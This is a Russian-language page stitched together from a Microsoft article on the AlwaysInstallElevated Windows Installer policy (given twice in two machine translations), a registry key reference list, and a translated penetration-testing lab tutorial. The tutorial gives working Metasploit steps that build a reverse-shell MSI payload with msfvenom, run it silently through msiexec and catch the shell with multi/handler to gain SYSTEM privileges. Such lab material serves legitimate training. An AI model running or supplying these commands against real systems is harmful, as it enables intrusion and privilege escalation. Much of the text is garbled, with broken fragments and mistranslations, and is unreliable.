AlwaysInstallElevated — Win32 apps | Microsoft Learn
Twitter LinkedIn Facebook Адрес электронной почты
- Статья
- Чтение занимает 2 мин
Политику AlwaysInstallElevated можно использовать для установки пакета установщика Windows с повышенными привилегиями (систем).
**Предупреждение: **
Этот вариант эквивалентен предоставлению полных административных прав, что может представлять огромный риск безопасности. Корпорация Майкрософт настоятельно не рекомендует использовать этот параметр.
Чтобы установить пакет с повышенными привилегиями (системные), задайте для параметра AlwaysInstallElevated значение 1 в обоих следующих разделах реестра:
HKEY_CURRENT_USER\Программного обеспечения\Политики\Microsoft\\ Windows Installer
HKEY_LOCAL_MACHINE\Программного обеспечения\Политики\Microsoft\\ Windows Installer
Если для значения AlwaysInstallElevated не задано значение 1 в обоих предыдущих разделах реестра, установщик использует повышенные привилегии для установки управляемых приложений и использует уровень привилегий текущего пользователя для неуправляемых приложений.
Так как эта политика позволяет пользователям устанавливать приложения, которым требуется доступ к каталогам и разделам реестра, для которых у пользователя может не быть разрешения на просмотр или изменение, следует рассмотреть вопрос о том, предоставляет ли он пользователям соответствующий уровень безопасности. Установка этой политики направляет установщик Windows использовать системные разрешения при установке приложения в системе. Если эта политика не задана, приложения, не распространяемые администратором, устанавливаются с помощью привилегий пользователя, и только управляемые приложения получают повышенные привилегии.
Обратите внимание, что после включения политики для каждого компьютера для AlwaysInstallElevated любой пользователь может задать свой параметр для каждого пользователя.
Сведения о взаимодействии этой политики с источниками установки см. в разделе «Управление источниками установки».
REG_DWORD
WindowsAccessoriesWindows Installer.
Справочник по реестру Windows XPWindowsAccessoriesWindows Installer
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallPCHealth\UninstallString
Если в командной строке запустить значение данного параметра rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 %SystemRoot%InfPCHealth.inf можно удалить программу PC Health вместе с MSConfig (освободив порядка 25 Мб). Запустить справку Windows по F1 после этого, вы уже не сможете.
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMSIServer\ImagePath
Если, при попытке установить или удалить программу в Windows XP, выдается сообщение об ошибке: «Error 1719. не удаётся получить доступ к службе „Windows installer“. Либо Windows работает в защищённом режиме, либо служба „Windows installer“ установлена неправильно», то данный сбой может возникнуть при установке или удалении программ, использующих Windows Installer, дистрибутив которых представлен в виде MSI-файла (Microsoft Software Installation).
Удостоверьтесь, что в значении данного параметра указан правильный путь к файлу msiexec.exe. По умолчанию параметр имеетЗначение: %SystemRoot%System32msiexec.exe /V
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSetup\LogLevel
При установке Windows можно заставить установщик вести подробный протокол, который можно будет использовать для диагностики проблем задав данному параметру значение 0хFFF. Очевидно, что при инсталляции Windows редактор реестра будет недоступен, поэтому придется отредактировать файл установки, чтобы он сам создал требуемую переменную. Для этого в дистрибутиве Windows откройте папку I386 и найдите файл Hivesft.inf. Откройте его при помощи любого текстового редактора и найдите строку HKLM,»SOFTWAREMicrosoftWindowsCurrentVersionSetup»,»DriverCachePath»,0x00020002,»%SystemRoot%Driver Cache», сразу под этой строчкой добавьте следующую строку HKLM,»SOFTWAREMicrosoftWindowsCurrentVersionSetup», «LogLevel»,0x00010003,0xFFFF, обратите внимание, что эти два параметра должны располагаться каждый на отдельной строке.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\AlwaysInstallElevated
Bceгдa пpoизвoдить уcтaнoвку c пoвышeнными пpивилeгиями. Требует от установщика Windows, чтобы он использовал системные разрешения при установке любой программы на этой системе. ВНИМАНИЕ= Устанавливать данный параметр необходио как для кoмпьютepa так и для пoльзoвaтeля.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.
HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstaller\AlwaysInstallElevated
Bceгдa пpoизвoдить уcтaнoвку c пoвышeнными пpивилeгиями. Требует от установщика Windows, чтобы он использовал системные разрешения при установке любой программы на этой системе. ВНИМАНИЕ= Устанавливать данный параметр необходио как для кoмпьютepa так и для пoльзoвaтeля.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.
HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstaller\SearchOrder
Пopядoк пoиcкa уcтaнoвoчныx фaйлoв. Задает порядок, в котором установщик Windows Installer выполняет поиск установочных файлов. По умолчанию, Windows Installer сначала выполняет поиск в сети, затем на съемных носителях (дискетах, компакт-дисках или DVD), и наконец, в Интернете (URL). Чтобы изменить порядок выполнения поиска, следует включить этот параметр, а затем ввести следующие буквы, представляющие вышеперечисленные источники файлов, в том порядке, в котором установщику Windows Installer следует выполнять поиск:
«n» соответствует локальной сети;
«m» соответствует съемным носителям;
«u» соответствует URL, или Интернету.
Чтобы исключить один из этих источников файлов, следует пропустить или удалить букву, соответствующую этому типу источника.
Тип: REGSZ;
Значение: (по умолчанию параметра нет) Групповая политика.
HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstaller\DisableRollback
Зaпpeтить oткaт при установке. Запрещает установщику Windows Installer создавать и сохранять файлы, нужные для восстановления исходного состояния после прерванной или неудачной установки.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = запретить) Групповая политика.
HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstaller\DisableMedia
Зaпpeтить иcпoльзoвaниe cъeмныx нocитeлeй пpи уcтaнoвкe.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = запретить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\DisableMSI
Отключение Windows Installer.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = тoлькo для нe oбcлуживaeмыx пpoгpaмм; 2 = отключить)
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\DisableRollback
Зaпpeтить oткaт при установке. Запрещает установщику Windows Installer создавать и сохранять файлы, нужные для восстановления исходного состояния после прерванной или неудачной установки.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = запретить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\DisableBrowse
Запрещает пользователям осуществлять поиск файлов установки во время добавления новых возможностей или компонентов установленных программ.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = запретить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\DisablePatch
Запрещает пользователям использовать «Установщик Windows» для установки пакетов исправлений.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = запретить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\SafeForScripting
Позволяет программам, использующим веб-технологии, устанавливать программное обеспечение на этом компьютере без уведомления пользователя об этом.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\EnableUserControl
Разрешает пользователям изменять параметры установки, которые обычно доступны только администраторам.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\AllowLockdownBrowse
Разрешает пользователям производить поиск исходных файлов во время привилегированных установок.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\AllowLockdownMedia
Разрешает пользователям устанавливать во время привилегированных установок программы со съемных носителей, таких как дискеты и компакт-диски.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\AllowLockdownPatch
Разрешает пользователям производить обновление программ во время привилегированных установок.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\EnableAdminTSRemote
Удаленная установка и настройка программного обеспечения с помощью Windows Installer.
Тип: REGDWORD;
Значение: (0 = отключить; 1 = включить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\TransformsSecure
Сохраняет копии файлов трансформации в безопасном месте на локальном компьютере.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\DisableUserInstalls
Зaпpeтить уcтaнoвки для пoльзoвaтeлeй.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 0 = рaзpeшить уcтaнoвки для пoльзoвaтeй; 1 = скpыть уcтaнoвки для пoльзoвaтeлeй; 2 = зaпpeтить уcтaнoвки для пoльзoвaтeлей) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\LimitSystemRestoreCheckpointing
Oтключить coздaниe кoнтpoльныx тoчeк вoccтaнoвлeния cиcтeмы.
Тип: REGDWORD;
Значение: (по умолчанию параметра нет; 1 = отключить) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTSetup\SourcePath
Укaзaть pacпoлoжeниe уcтaнoвoчныx фaйлoв Windows.
Тип: REGSZ;
Значение: (по умолчанию параметра нет; путь к уcтaнoвoчным фaйлaм Windows) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTSetup\ServicePackSourcePath
Укaзaть paзмeщeниe уcтaнoвoчныx фaйлoв пaкeтa oбнoвлeния Windows.
Тип: REGSZ;
Значение: (по умолчанию параметра нет; путь к уcтaнoвoчным фaйлaм пaкeтa oбнoвлeния Windows) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\Logging
Ведение подробного лога инсталлятора Windows. Для aктивизaции peжимa жуpнaлa выбepитe oдин из peжимoв. Иcпoльзoвaниe «iwearucmpvo» пoзвoлит зaнocить в жуpнaл вce coбытия, нo зaмeдлит уcтaнoвку.
Тип: REGSZ;
Значение: (i = cooбщeния cocтoяния; w = нe кpитичecкиe пpeдупpeждeния; e = вce cooбщeния oб oшибкax; a = зaпуcки дeйcтвий; r = зaпиcи, cпeцифичecкиe для дeйcтвия; u = зaпpocы пoльзoвaтeля; c = нaчaльныe пapaмeтpы интepфeйca пoльзoвaтeля; m = нexвaткa пaмяти; p = cвoйcтвa тepминaлa; v = пoдpoбный вывoд; o = cooбщeния o нexвaткe мecтa нa диcкe) Групповая политика.
HKEY_LOCAL_MACHINESOFTWAREClasses.inf\(default)
Чтобы INF файлы открывались в блокноте меняем значение параметра.
Тип: REGSZ;
Значение: (по умолчанию = inffile; в блокноте = txtfile)
AlwaysInstallElevated — приложения Win32 | Microsoft Узнайте
Редактировать
Твиттер LinkedIn Фейсбук Электронная почта
- Статья
- 2 минуты на чтение
Вы можете использовать политику AlwaysInstallElevated для установки пакета установщика Windows с повышенными (системными) привилегиями.
**Предупреждение: **
Этот вариант эквивалентен предоставлению полных административных прав, что может представлять серьезную угрозу безопасности. Microsoft настоятельно не рекомендует использовать этот параметр.
Чтобы установить пакет с повышенными (системными) привилегиями, установите для параметра AlwaysInstallElevated значение «1» в обоих следующих разделах реестра: \ Установщик
HKEY_LOCAL_MACHINE \ Программное обеспечение \ Политики \ Microsoft \ Windows \ Установитель
, если всегда используется не установлена. повышенные привилегии для установки управляемых приложений и использует уровень привилегий текущего пользователя для неуправляемых приложений.
Поскольку эта политика разрешает пользователям устанавливать приложения, которым требуется доступ к каталогам и разделам реестра, для которых у пользователя может не быть разрешения на просмотр или изменение, вам следует подумать, обеспечивает ли она вашим пользователям надлежащий уровень безопасности. Установка этой политики предписывает установщику Windows использовать системные разрешения при установке приложения в системе. Если эта политика не задана, приложения, не распространяемые администратором, устанавливаются с использованием привилегий пользователя, и только управляемые приложения получают повышенные привилегии.
Обратите внимание, что после включения политики для каждой машины для AlwaysInstallElevated любой пользователь может установить свои настройки для каждого пользователя.
Сведения о взаимодействии этой политики с источниками установки см. в разделе Управление источниками установки.
REG_DWORD
Повышение привилегий Windows (AlwaysInstallElevated) | Анастасис Василеядис
Привет друзья!! В этой статье мы демонстрируем метод повышения привилегий Windows с помощью метода Политика AlwaysInstallElevated . При тестировании на проникновение, когда мы запускаем командную оболочку в качестве локального пользователя, можно использовать уязвимые функции (или параметры конфигурации) групповой политики Windows, чтобы дополнительно повысить их до прав администратора и получить доступ администратора
Содержание
- Введение
- Лабораторная установка
- Создать командную оболочку от имени локального пользователя
- Повышение привилегий вручную с помощью полезной нагрузки . msi (MSfvenom)
- Повышение привилегий с помощью добавления группы администраторов пользователей (Msfvenom)
- Повышение привилегий с помощью Post-эксплойта (Metasploit)
Введение
AlwaysInstallElevated Policy Поскольку установщик Windows поставляется с установленной политикой Windows, все мы знаем, что движок, который используется пакетами MSI для установки приложений. Эти пакеты MSI могут быть установлены с повышенными привилегиями для пользователей без прав администратораДля этой цели функция политики AlwaysInstallElevated используется для установки файла пакета MSI с повышенными (системными) привилегиями. Эта политика, если она включена в редакторе локальной групповой политики; предписывает механизму установки Windows использовать повышенные разрешения при установке любой программы в системе. Этот метод может сделать машину уязвимой, что создает высокий риск для безопасности, поскольку пользователь, не являющийся администратором, может запускать установки с повышенными привилегиями и получать доступ ко многим безопасным местам на компьютере.
Внимание! Примечание: Этот параметр эквивалентен предоставлению полных административных прав, что может представлять серьезную угрозу безопасности. Microsoft настоятельно не рекомендует использовать этот параметр. Следовательно, это следует использовать только для целей лаборатории (а не в производственной среде)
Настройка лаборатории
Компьютер жертвы: Windows 7
Компьютер злоумышленника: Kali Linux
Чтобы сделать эту политику эффективной [т.е. пакет с повышенными (системными) привилегиями], нам нужно убедиться, что машина-жертва преднамеренно сделана уязвимой, включив AlwaysInstalledElevated Политика в папках «Конфигурация компьютера» и «Конфигурация пользователя» редактора локальной групповой политики
Для конфигурации Windows Откроется окно редактора локальной групповой политики- Изменение параметров политики AlwaysInstalledElevated
- Для конфигурации компьютера
Перейдите к приведенному пути в Windows Machine
Конфигурация компьютера \ Административные шаблоны \ Компоненты Windows \ Windows Installer
Включить Всегда установка с поднятыми привилегиями
Для пользовательской конфигурации9003
для Пользовательской конфигурации9003
для Пользовательской конфигурации 777 указанный ниже путь на компьютере с WindowsКонфигурация пользователя\Административные шаблоны\Компоненты Windows\Установщик Windows
Включите Всегда устанавливайте с повышенными привилегиями
На этом лабораторная установка на компьютере с Windows завершена. Теперь давайте перейдем к нашей актуальной задаче.
Создание машины жертвы
Нам нужно хотя бы один раз скомпрометировать машину жертвы Windows, чтобы получить сеанс meterpreter. Как вы можете заметить, у нас уже есть сеанс metrepreter жертвы. Откроем msfconsole и проверим существующие текущие сессии
msfconsole
sessions
1
2
msfconsole
session
Как мы видим, уже существует сеанс с ID 1 . Теперь давайте откроем сеанс 1 и извлечем данные пользователя
meterpreter > session 1
meterpreter >getuid
1
2
meterpreter >sessions 1
meterpreter >getuid
Как мы видим, что мы есть вошел в этот сеанс с именем пользователя raj.
Примечание: Существующий пользователь «raj» уже существует на компьютере-жертве Windows 7 и не является пользователем-администратором
Теперь давайте откроем командную оболочку целевой машины
После выполнения команды оболочки мы попадем в папку «Загрузки» пользователя C:\Users\raj\Downloads
Теперь мы запустим команду запроса реестра в этой командной строке, чтобы проверить, имеет ли установщик Windows повышенные привилегии или нет, согласно нашим настройкам настроенным ранее
reg-запрос HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg-запрос HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
1
2
reg-запрос HKEY_CURRENT_USER\Microsoftware Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
Как видно из вывода, реестр с именем «AlwaysInstallElevated» существует со значением двойного слова (REG_WORD) 0x1 , что означает, что включена политика AlwaysInstallElevated.
Повышение привилегий с помощью полезной нагрузки .msi (1-й метод)Теперь давайте откроем новый терминал на машине Kali и сгенерируем файл пакета MSI ( 1.msi ), используя полезную нагрузку Windows Meterpreter следующим образом
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4567 –f msi > /root/Desktop/1.msi
1
msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4567 –f msi > /root/Рабочий стол/1.msi
В существующем сеансе Meterpreter пользователя давайте загрузим наш файл MSI с именем 1.msi на целевую машину следующим образом. После успешной загрузки мы перейдем к оболочке
upload /root/Desktop/1.msi .
1
загрузить /root/Desktop/1.msi .
Примечание: Перед выполнением файла пакета MSI запустите обработчик MSF в другом окне терминала
(см. команды для того же, после снимка экрана ниже)
Запустите файл пакета MSI в командной строке Windows
msiexec /quiet /qn /i 1. msi
1
msiexec /quiet /qn /i 1.msi
/quiet = подавление любых сообщений пользователь во время установки
/qn = без графического интерфейса
/i = обычная (в отличие от административной) установка
В параллельном окне мы открыли новый обработчик перед выполнением файла .msi
msf > использовать эксплойт/ multi/handler
эксплойт msf (обработчик) > установить полезную нагрузку windows/meterpreter/reverse_tcp
эксплойт msf (обработчик) > установить lhost 192.168.1.120
эксплойт MSF (обработчик) > set lport 4567
эксплойт MSF (обработчик) > эксплойт
1
2
3
4
5 900 use/mstif /handler
эксплойт MSF (обработчик) > установить полезную нагрузку windows/meterpreter/reverse_tcp
эксплойт MSF (обработчик) > установить lhost 192.168.1.120
эксплойт MSF (обработчик) > установить lport 4567
эксплойт MSF > эксплойт
Наконец-то мы получили сеанс meterpreter, используя этот эксплойт!! Давайте подробнее рассмотрим привилегии пользователя, которые мы получили в этой системе 9.